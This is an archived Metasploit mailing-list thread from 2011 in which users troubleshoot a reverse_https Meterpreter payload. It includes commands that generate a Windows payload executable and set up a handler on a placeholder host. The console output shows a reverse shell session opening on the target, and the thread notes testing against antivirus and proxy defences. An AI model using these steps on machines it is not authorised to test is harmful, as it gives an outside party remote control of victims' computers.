|Main Archive Page > Month Archives > metasploit-framework archives|
make sure your LPORT is right, by default reverse_https connects to 8443.
i just tested with current svn and it worked.
chris@carnal0wnage:~/trunk$ ./msfpayload windows/meterpreter/reverse_https LHOST
Created by msfpayload (http://www.metasploit.com).
chris@carnal0wnage:~/trunk$ file demohttps.exe
demohttps.exe: MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit
=[ metasploit v3.6.0-beta [core:3.6 api:1.0]
+ -- --=[ 647 exploits - 342 auxiliary
+ -- --=[ 257 payloads - 27 encoders - 8 nops
=[ svn r11870 updated today (2011.03.03)
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
PAYLOAD => windows/meterpreter/reverse_https
msf exploit(handler) > set LHOST y.y.y.y
LHOST => y.y.y.y
msf exploit(handler) > set LPORT 8443
LPORT => 8443
msf exploit(handler) > exploit
[*] Started HTTPS reverse handler on https://y.y.y.y:8443/
[*] Starting the payload handler...
[*] x.x.x.x:23735 Request received for /AyCku...
[*] x.x.x.x:23735 Staging connection for target yCku received...
[*] Patching Target ID yCku into DLL
[*] x.x.x.x:23736 Request received for /ByCku...
[*] x.x.x.x:23736 Stage connection for target yCku received...
[*] Meterpreter session 1 opened (y.y.y.y:8443 -> x.x.x.x:23736) at
Thu Mar 03 16:17:48 +0000 2011
meterpreter > sysinfo
Computer : COMPUTER
OS : Windows XP (Build 2600, Service Pack 3).
Arch : x86
Language : en_US
On Thu, Mar 3, 2011 at 4:00 AM, JOhn Mistikopoulos
> I have tried numerous scenarios such as:
> 1. Middle proxy servers (more than 3 different web proxy software)
> 2. A single proxy server
> 3. No proxy server
> 4. Over the internet and locally (get the same error)
> 5. Tested with different service packs (WinXP SP1, SP3, Win7)
> 6. Tested with IE6, unpatched.
> 7. Tested with different user accounts and group policies.
> 8. Tested in Symantec and McAfee Endpoint protection (none marked it as a
> 9. Tested without any AV protection or Firewall-IPS.
> When I run the payload (for example the "exe" file in an unprotected PC - no
> AV, no IPS) I got the its name on the task manager just for a while and then
> HoweverI don't see any instance of iexplorer.exe running.
> On Wed, Mar 2, 2011 at 5:35 PM, HD Moore <firstname.lastname@example.org> wrote:
>> On 2/28/2011 6:13 AM, JOhn Mistikopoulos wrote:
>> > And then, the listener stops giving any other info.
>> > I went to the victim PC and realized that the payload exe had already
>> > dies.
>> > I couldn't see it on the task manager.
>> > Concurrently, I had been running wireshark.
>> > The two last packets were:
>> > 1. Victim => Listener (RST, ACK)
>> > 2. Listener => Victim (FIN, ACK)
>> > Finally I don't get any connections.
>> > Does anyone know how to fix this?
>> Is there any network proxy/filter between the target and yourself? Is
>> the target running an endpoint protection product or HIPS? Is the target
>> process a user-process (IE) or a system process (assuming IE/user-land)?
>> The reverse_https payload is finicky based on the WinInet profile of the
>> user running the code.